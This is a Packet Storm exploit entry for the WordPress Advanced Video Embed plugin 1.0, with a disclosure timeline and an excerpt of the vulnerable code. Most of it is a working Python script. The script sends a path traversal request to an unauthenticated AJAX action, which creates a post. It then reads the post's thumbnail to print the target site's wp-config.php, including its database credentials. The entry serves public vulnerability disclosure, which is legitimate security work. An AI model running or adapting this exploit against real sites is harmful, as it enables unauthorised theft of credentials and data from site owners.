WordPress Advanced Video 1.0 Local File Inclusion

2016-04-01T00:00:00
ID PACKETSTORM:136566
Type packetstorm
Reporter evait security GmbH
Modified 2016-04-01T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation  
# Google Dork: N/A  
# Date: 04/01/2016  
# Exploit Author: evait security GmbH  
# Vendor Homepage: arshmultani - http://dscom.it/  
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/  
# Version: 1.0  
# Tested on: Linux Apache / Wordpress 4.2.2  
  
# Timeline  
# 03/24/2016 - Bug discovered  
# 03/24/2016 - Initial notification of vendor  
# 04/01/2016 - No answer from vendor, public release of bug   
  
  
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:  
  
# function ave_publishPost(){  
# $title = $_REQUEST['title'];  
# $term = $_REQUEST['term'];  
# $thumb = $_REQUEST['thumb'];  
# <snip>  
# Line 78:  
# $image_data = file_get_contents($thumb);  
  
  
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]  
  
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)  
  
import random  
import urllib2  
import re  
  
url = "http://127.0.0.1/wordpress" # insert url to wordpress  
  
randomID = long(random.random() * 100000000000000000L)  
  
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')  
content = objHtml.readlines()  
for line in content:  
numbers = re.findall(r'\d+',line)  
id = numbers[-1]  
id = int(id) / 10  
  
objHtml = urllib2.urlopen(url + '/?p=' + str(id))  
content = objHtml.readlines()  
  
for line in content:  
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:  
urls=re.findall('"(https?://.*?)"', line)  
print urllib2.urlopen(urls[0]).read()  
  
`